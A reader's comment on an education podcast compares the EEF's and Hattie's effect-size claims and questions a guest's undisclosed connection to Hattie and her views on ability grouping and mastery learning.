  2. Thanks I just stumbled on your podcasts. There are a lot of questions I would have liked to have asked. Why does the EEF have an effect size of 0.1 = 1 months progress? Whereas Hattie has 0.4 = 1 years progress. That is a big difference!

    Looking specifically at feedback why does the EEF use very different studies compared to Hattie?

    Also, why are Hattie’s top ranked influences – self report, Piagetian programs and teacher collective efficacy not even mentioned in the EEF list?

    Currently here in Melbourne, the leadership training designed by the Vic Education Dept, the No.1 priority is we MUST read Hattie’s book on Teacher Collective Efficacy.The Ed Dept make out like this is fact but it is not mentioned by EEF?

    Also, Janet Clinton does not reveal she is John Hattie’s wife and I think that is important for listeners to know.

    Clinton gives ability grouping a bad rap, but I don’t believe the evidence is that straight forward – see Dylan Wiliam. Also, she promotes “Mastery Learning” but she does not seem to know that one of the preconditions for mastery learning is similar ability groups! See one of the world experts – Mark McCourt – “Teaching for Mastery”
